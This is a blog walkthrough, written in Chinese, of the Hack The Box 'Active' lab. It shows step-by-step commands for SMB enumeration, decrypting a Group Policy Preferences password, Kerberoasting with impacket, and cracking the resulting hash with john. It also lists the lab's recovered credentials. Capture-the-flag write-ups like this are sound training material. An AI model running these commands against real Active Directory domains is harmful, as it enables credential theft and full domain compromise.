Flydragon's Blog
572 words
3 minutes
[HTB] Active Walkthrough

visitor badge

前言#

這台是 Hack The Box 的 Active,難度是 Easy 也是 AD Track 的第三台

使用到的技巧:

  1. Extract password from Group Policy Preferences XML file
  2. Kerberoasting

Attacker: 10.10.16.6
Target: 10.10.10.100

Recon#

  1. nmap
sudo nmap -sV -sC 10.10.10.100
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-05-14 00:43:40Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -5m10s
| smb2-time: 
|   date: 2024-05-14T00:44:38
|_  start_date: 2024-05-12T14:12:52
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled and required

值得關注的有 domain, kerberos, ldap 以及 smb

  1. smb
smbclient -N -L \\\\10.10.10.100\\
Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share 
Replication     Disk      
SYSVOL          Disk      Logon server share 
Users           Disk
smbmap -H 10.10.10.100
Disk                        Permissions     Comment
----                        -----------     -------
ADMIN$                      NO ACCESS       Remote Admin
C$                          NO ACCESS       Default share
IPC$                        NO ACCESS       Remote IPC
NETLOGON                    NO ACCESS       Logon server share 
Replication                 READ ONLY
SYSVOL                      NO ACCESS       Logon server share 
Users                       NO ACCESS

Replication 有開匿名

smbclient -N -L \\\\10.10.10.100\\Replication

翻一下到這個路徑拿到 Groups.xml

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
  1. ldap
ldapsearch -H ldap://10.10.10.100 -x -s base namingcontexts
dn:
namingContexts: DC=active,DC=htb
namingContexts: CN=Configuration,DC=active,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=active,DC=htb
namingContexts: DC=DomainDnsZones,DC=active,DC=htb
namingContexts: DC=ForestDnsZones,DC=active,DC=htb

嘗試 AS-REP-Roasting

impacket-GetNPUsers active.htb/ -dc-ip 10.10.10.100 -request

失敗

Exploit#

嘗試用這個工具解出 Groups.xml 密碼
https://github.com/t0thkr1s/gpp-decrypt alt text

嘗試用 evil-winrm 連上主機

evil-winrm -i 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18

失敗了

smbmap + credential 再列舉一次

smbmap -H 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18

alt text

再用 smbclient 連上去

smbclient \\\\10.10.10.100\\Users -U SVC_TGS%GPPstillStandingStrong2k18

到桌面就可以拿到 flag 了

Privilege Escalation#

有 kerberos,嘗試一下 Kerberoasting

impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request

alt text

查到這篇
https://github.com/ivanitlearning/CTF-Repos/blob/master/HTB/Sauna/Kerberoasting-HSmith.md

笑死是 AD track 前一台的文

沒想到是跟時間有關

sudo ntpdate 10.10.10.100

重送一次就拿到 password hash 了
alt text

用 john + rockyou crack

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

alt text

smbclient \\\\10.10.10.100\\Users -U Administrator%Ticketmaster1968

一樣到桌面就拿到 flag 了

後記#

終於完成 Tj Null’s List 的 PWK V1,總共打了 30 個 box,有些評分太低的我就沒打了
當初參加 CODE 的時候隊友用 Metasploit 很帥,結果現在都在學不用 Metasploit 解題 ==
本來是想一天打一台,結果四個月只打了 30 台,話還是不要說太滿。

[HTB] Active Walkthrough
https://flydragonw.github.io/posts/htb_active/
Author
FlyDragon
Published at
2024-05-14